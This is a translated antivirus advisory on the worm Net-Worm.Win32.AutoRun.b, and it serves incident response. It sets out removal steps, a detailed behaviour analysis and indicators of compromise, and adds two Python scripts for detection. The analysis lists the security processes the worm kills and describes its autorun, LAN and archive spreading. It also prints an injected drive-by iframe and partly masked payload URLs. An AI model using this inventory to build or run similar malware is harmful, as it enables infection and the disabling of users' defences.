Worm: Net-Worm.Win32.AutoRun.b
Risk level: Medium
Virus Description
The sample is written in C/C++, is 56,072 bytes in size and has the extension "exe". It spreads mainly through file bundling, downloads by download tools, infection of removable storage and infection across the LAN; the main purpose of spreading across the LAN is to build a network of infected machines.
After the user's computer is infected, security software is terminated for no apparent reason, antivirus windows cannot be opened, the system runs slowly, Safe Mode cannot be entered and System Restore cannot be used.
Infected OS
Windows 2000/Windows XP / Windows 2003/Windows Vista / Windows 7
Transmission
File bundling, malicious web pages (drive-by download), downloads by download tools, removable storage infection, LAN infection
Manual Solution:
1. Manually end the process ini.exe.
2. Manually delete the following files:
%SystemRoot%\programs\fuckme.vbs
%SystemRoot%\programs\wsock32.dll
%SystemRoot%\Tasks\install.bat
%Temp%\configmon.dat
%SystemDriver%\__default.pif
%SystemRoot%\programs\ini.exe
%SystemRoot%\programs\desktop.ini
3. Delete every copy of wsock32.dll under all folders, then copy a clean wsock32.dll back to %SystemRoot%\system32\wsock32.dll.
4. Replace the current hosts file with a clean one; it is located at %SystemRoot%\system32\drivers\etc\hosts.
5. Edit all web page documents, find and delete the following string:
<iframe src=http://www.xx.cn/1.htm width=0 height=0></iframe>
6. Delete install.bat from all compressed archives.
7. If a USB flash drive has been infected, disable AutoPlay, open the drive and delete the following files:
X:\AUTORUN.INF (X is the removable drive letter)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe (X is the removable drive letter)
8. Delete the following registry key:
SOFTWARE\Microsoft\Active Setup\Installed Components\{H8I22RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
9. Import normal values for the following registry keys:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\
10. Restore the startup entries that were removed; the corresponding registry key is:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
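Steps 4 and 5 above can be verified offline before and after cleanup. The following script is an added example and is not part of the original advisory: it flags hosts-file entries for the security-vendor hostnames the advisory says the worm blocks (the list is reproduced from the analysis section), and it finds and strips zero-size iframes of the kind quoted in step 5. The hosts file and HTML page are constructed samples; the domain list and the iframe string come from the advisory.

```python
import re
from typing import Optional

# Security-vendor hostnames the advisory reports the worm adds to the hosts
# file. Reproduced from the advisory's list (item 18 of the analysis).
BLOCKED_HOSTS = {
    "360.qihoo.com", "qihoo.com", "www.qihoo.com", "www.qihoo.cn",
    "www.kaspersky.com", "www.cnnod32.cn", "www.lanniao.org",
    "www.nod32club.com", "www.dswlab.com", "bbs.sucop.com",
    "www.virustotal.com", "tool.ikaka.com", "www.jiangmin.com",
    "www.duba.net", "www.eset.com.cn", "www.nod32.com", "shadu.duba.net",
    "union.kingsoft.com", "www.kaspersky.com.cn", "kaspersky.com.cn",
    "virustotal.com", "www.360.cn", "www.360safe.cn", "www.360safe.com",
    "www.chinakv.com", "www.rising.com.cn", "rising.com.cn",
    "dl.jiangmin.com", "jiangmin.com",
}


def suspicious_hosts_entries(hosts_text: str) -> list[tuple[int, str, str]]:
    """Return (line_no, address, hostname) for every hosts entry that maps one
    of the vendor hostnames to any address. A clean hosts file has none of
    them, so every hit is an entry to remove (step 4)."""
    hits = []
    for n, raw in enumerate(hosts_text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blanks
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue
        address, names = parts[0], parts[1:]
        for name in names:  # one line may carry several hostnames
            if name.lower() in BLOCKED_HOSTS:
                hits.append((n, address, name.lower()))
    return hits


# Whole iframe element, tolerant of the "</ iframe>" spelling in the advisory.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>.*?</\s*iframe\s*>", re.IGNORECASE | re.DOTALL)
# name=value pairs inside the opening tag; the value may be unquoted.
ATTR_RE = re.compile(r"""(\w+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")


def _is_zero(value: str) -> bool:
    return value.lower().rstrip("px").strip() == "0"


def _hidden_iframe_src(tag: str) -> Optional[str]:
    """Return the src of an iframe whose width and height are both 0, else None."""
    open_tag = tag[: tag.index(">") + 1]
    attrs = {k.lower(): v.strip("\"'") for k, v in ATTR_RE.findall(open_tag)}
    if _is_zero(attrs.get("width", "")) and _is_zero(attrs.get("height", "")):
        return attrs.get("src", "")
    return None


def hidden_iframes(html: str) -> list[str]:
    """List the src of every zero-size iframe in the page (step 5 triage)."""
    srcs = (_hidden_iframe_src(m.group(0)) for m in IFRAME_RE.finditer(html))
    return [s for s in srcs if s is not None]


def strip_hidden_iframes(html: str) -> tuple[str, int]:
    """Remove zero-size iframes; return the cleaned page and the count removed."""
    removed = 0

    def repl(m: re.Match) -> str:
        nonlocal removed
        if _hidden_iframe_src(m.group(0)) is not None:
            removed += 1
            return ""
        return m.group(0)

    return IFRAME_RE.sub(repl, html), removed


# Constructed samples for a stand-alone run.
SAMPLE_HOSTS = """# constructed sample hosts file
127.0.0.1   localhost
127.0.0.1   www.kaspersky.com
127.0.0.1   bbs.sucop.com   www.virustotal.com  # two names on one line
10.0.0.5    intranet.example   # unrelated, must not be flagged
"""
SAMPLE_HTML = (
    "<html><body><h1>Hello</h1>"
    "<iframe src=http://www.xx.cn/1.htm width=0 height=0></ iframe>"   # from the advisory
    '<iframe src="https://example.invalid/video" width="640" height="360"></iframe>'
    "</body></html>"
)

if __name__ == "__main__":
    for line_no, address, name in suspicious_hosts_entries(SAMPLE_HOSTS):
        print(f"hosts line {line_no}: {name} -> {address}")
    cleaned, count = strip_hidden_iframes(SAMPLE_HTML)
    print(f"removed {count} hidden iframe(s): {hidden_iframes(SAMPLE_HTML)}")
```

Run it over the real files by reading `%SystemRoot%\system32\drivers\etc\hosts` and each page under the web root; the iframe check deliberately keys on the zero width and height rather than on the one URL, since the advisory masks the real address.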
Variable definitions:
%SystemDriver%: the partition the system is installed on, typically "C:\"
%SystemRoot%: the WINDOWS directory, usually "C:\Windows"
%Documents and Settings%: the user profile directory, usually "C:\Documents and Settings"
%Temp%: the temporary folder, usually "C:\Documents and Settings\<current user name>\Local Settings\Temp"
%ProgramFiles%: the default program installation directory, typically "C:\Program Files"
Virus Analysis
(1) The virus program carries a forged Kaspersky digital signature (the signature is invalid) in an attempt to mislead the user.
(2) The virus creates the directory %SystemRoot%\programs\, creates a new program ini.exe in that directory and then runs it.
(3) In %SystemRoot%\programs\ it creates the file desktop.ini as an infection marker. Once that is done, it invokes the command line to delete itself.
(4) %SystemRoot%\programs\ini.exe creates a mutex named "shors1.3" so that it does not run more than once.
(5) Creates a thread that sets up a message loop and repeatedly enumerates the process list. Whenever a process with one of the following names is found, it is sent a close command: "safeboxTray.exe", "360Safe.exe", "360safebox.exe", "360tray.exe", "Iparmor.exe", "WEBSCANX.EXE", "TBSCAN.EXE", "TrojanHunter.exe", "THGUARD.EXE", "FWMon.exe", "mmsk.exe", "vptray.exe", "kav32.exe", "kwatch.exe", "kavstart.exe", "kissvc.exe", "kasmain.exe", "RavLite.exe", "RavMon.exe", "CCenter.exe", "UlibCfg.exe", "RavMonD.exe", "RavTask.exe", "FileDsty.exe", "EGHOST.EXE", "Navapw32.exe", "rfwsrv.exe", "rfwmain.exe", "rfwproxy.exe"
(6) Creates a thread that sets up a message loop and repeatedly inspects window titles. Whenever a window title contains one of the following strings (translated from the worm's Chinese keyword list; several distinct keywords render as the same English word), the window is sent a close command: "Antivirus", "worm", "Kaspersky", "super patrol", "Jiangmin", "offline update", "Gold Mountain", "Anti", "anti", "Virus", "virus", "Firewall", "test", "Mcafee", "virus", "killing", "spy Sword", "Firewall", "active defense", "micro-point", "defense", "System Protection", "Green Eagle", "Active", "kill the horse", "trojan", "infected", "Eliminator", "report", "report", "report", "Rising", "process", "process", "system security", "Process", "NOD32", "intercept", "back door", "Control", "security guards", "monitor only kill"
(7) Creates a thread that repeatedly reads the title of the foreground window; if it contains "IceSword", the window is sent a close message.
(8) Creates a thread that repeatedly enumerates drive letters and queries their type. Whenever a removable drive is found, it creates X:\AUTORUN.INF in the drive root (X is the removable drive letter) and a folder X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ disguised as the Recycle Bin. Both are then given the read-only, system and hidden attributes.
(9) The virus copies itself to X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe (X is the removable drive letter). When the removable drive is mounted, AUTORUN.INF automatically runs ini.exe from the recycle.{645FF040-5081-101B-9F08-00AA002F954E} folder.
(10) Creates a thread that sets up a message loop. It deletes the script settings key, corresponding to the registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings
It repeatedly deletes and recreates a registry entry that loads %SystemRoot%\programs\fuckme.vbs at boot, and creates the corresponding VBS script %SystemRoot%\programs\fuckme.vbs, which runs %SystemRoot%\programs\ini.exe. The corresponding registry value:
SOFTWARE\Microsoft\Active Setup\Installed Components\{H8I22RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
Name: StubPath
Value: %windir%\programs\fuckme.vbs
(11) Creates the dynamic link library file %SystemRoot%\programs\wsock32.dll.
(12) Creates a thread that traverses every file on all drive letters other than A and C, looking for web documents with the extensions "html", "htm", "asp", "aspx", "php" and "jsp"; into each page found it embeds an invisible page element pointing to the malicious (drive-by download) website. At the same time it looks for Ghost backup files with the extensions "gho", "GHO" and "Gho" and deletes them immediately so that the user cannot restore the system.
(13) Creates a thread that sets up a message loop and scans every IP address in the same LAN segment, tries to connect to the other computers on the LAN using weak passwords, and tries to copy itself under the name kav32.exe to the target computer's shared folders and the root directories of drives C, D, E and F. On success it runs the program remotely in a hidden window, infecting the other machines on the LAN.
(14) Creates a thread that obtains the system path and copies itself into the Scheduled Tasks folder under the name %SystemRoot%\Tasks\install.bat. It then traverses every file on all drive letters other than A and C looking for archives with the extensions "rar", "zip", "tgz", "cab" and "tar"; whenever one is found, it calls the WinRAR command line to add %SystemRoot%\Tasks\install.bat to the archive.
(15) Creates a thread that downloads the virus from a designated website, stores it as %Temp%\configmon.dat and runs it after a successful download.
(16) Creates a thread that traverses every folder on drive C and copies %SystemRoot%\programs\wsock32.dll into each of them, replacing the normal system file.
(17) Creates a thread that repeatedly downloads the virus from a designated website, stores it as %SystemDriver%\__default.pif and runs it after a successful download.
(18) Creates a thread that modifies the hosts file to block the following security-software and security-support websites: "360.qihoo.com", "qihoo.com", "www.qihoo.com", "www.qihoo.cn", "124.40.51.17", "58.17.236.92", "www.kaspersky.com", "60.210.176.251", "www.cnnod32.cn", "www.lanniao.org", "www.nod32club.com", "www.dswlab.com", "bbs.sucop.com", "www.virustotal.com", "tool.ikaka.com", "www.jiangmin.com", "www.duba.net", "www.eset.com.cn", "www.nod32.com", "shadu.duba.net", "union.kingsoft.com", "www.kaspersky.com.cn", "kaspersky.com.cn", "virustotal.com", "www.360.cn", "www.360safe.cn", "www.360safe.com", "www.chinakv.com", "www.rising.com.cn", "rising.com.cn", "dl.jiangmin.com", "jiangmin.com"
(19) Creates a thread that sets up a message loop. It empties the system temporary folder %Temp%\ and the help-file folder %SystemRoot%\help\, and empties the startup entries to prevent security software from starting at boot. The corresponding registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
(20) Enters an infinite loop that repeatedly clears the Safe Boot registry entries so that the user cannot enter safe mode. The entries cleared are:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\
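Items (8) and (9) describe the removable-drive layout: an AUTORUN.INF in the root and a folder named with the Recycle Bin class identifier, which Explorer renders as the Recycle Bin. The following script is an added example, not the advisory's code: a tolerant AUTORUN.INF parser that reports launcher keys and rates any that point into such a folder as high severity, plus a check for the folder-name disguise itself. The AUTORUN.INF contents are constructed to match the layout the advisory describes, not copied from a sample.

```python
# Added example: parse an AUTORUN.INF collected from a removable drive and
# flag the launcher layout described in items (8) and (9).

# Recycle Bin class identifier, as quoted in the advisory. A folder whose name
# ends in ".{this CLSID}" is shown by Explorer as the Recycle Bin.
RECYCLE_BIN_CLSID = "{645FF040-5081-101B-9F08-00AA002F954E}"

# Keys AutoPlay acts on to start a program.
LAUNCH_KEYS = ("open", "shellexecute")


def parse_autorun(text: str) -> dict[str, str]:
    """Map lowercase key -> value for the [autorun] section. Tolerates a BOM,
    CRLF line endings, ';' or '#' comment lines and stray text outside the
    section, which real-world files frequently contain."""
    entries: dict[str, str] = {}
    in_autorun = False
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip().strip('"')
    return entries


def is_launch_key(key: str) -> bool:
    """True for open=, shellexecute= and shell\\<verb>\\command= keys."""
    return key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command"))


def autorun_findings(text: str) -> list[tuple[str, str, str]]:
    """Return (severity, key, value) for every launcher key found.
    'high' when the target lives in a folder carrying the Recycle Bin CLSID,
    the disguise the advisory describes; 'info' for any other launcher, since
    a data-only drive has no reason to start a program on insertion."""
    findings = []
    for key, value in parse_autorun(text).items():
        if not is_launch_key(key):
            continue
        severity = "high" if RECYCLE_BIN_CLSID.lower() in value.lower() else "info"
        findings.append((severity, key, value))
    return findings


def looks_like_recycle_bin_disguise(folder_name: str) -> bool:
    """True when a folder name borrows the Recycle Bin CLSID suffix."""
    return folder_name.lower().endswith("." + RECYCLE_BIN_CLSID.lower())


# Constructed sample matching the layout of items (8) and (9).
SAMPLE_AUTORUN = (
    "\ufeff[AutoRun]\r\n"
    "; constructed sample, not captured from a real drive\r\n"
    "open=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\\ini.exe\r\n"
    "shellexecute=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\\ini.exe\r\n"
    "label=USB DISK\r\n"
)
# Constructed benign file: a label and icon only, nothing to launch.
BENIGN_AUTORUN = "[autorun]\nlabel=Backup Drive\nicon=backup.ico\n"

if __name__ == "__main__":
    for severity, key, value in autorun_findings(SAMPLE_AUTORUN):
        print(f"[{severity}] {key}={value}")
    for name in ("recycle.{645FF040-5081-101B-9F08-00AA002F954E}", "$RECYCLE.BIN"):
        print(name, "disguise" if looks_like_recycle_bin_disguise(name) else "ok")
```

When triaging a drive, read X:\AUTORUN.INF with the file's raw bytes (the parser strips a UTF-8 BOM) and list the root folders through a tool that shows hidden and system entries, since item (8) says both objects get those attributes.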
Files created by the virus:
%SystemRoot%\programs\ini.exe
%SystemRoot%\programs\desktop.ini
X:\AUTORUN.INF (X is the removable drive letter)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe (X is the removable drive letter)
%SystemRoot%\programs\fuckme.vbs
%SystemRoot%\programs\wsock32.dll
%SystemRoot%\Tasks\install.bat
%Temp%\configmon.dat
%SystemDriver%\__default.pif
Files modified by the virus:
%SystemRoot%\system32\drivers\etc\hosts
Registry keys created by the virus:
SOFTWARE\Microsoft\Active Setup\Installed Components\{H8I22RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
Registry keys deleted by the virus:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ (emptied)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ (emptied)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ (emptied)
Network addresses accessed by the virus:
http://www.***.cn/1.htm
http://180.***.222.137/1.exe
http://180.***.222.137/360safe.exe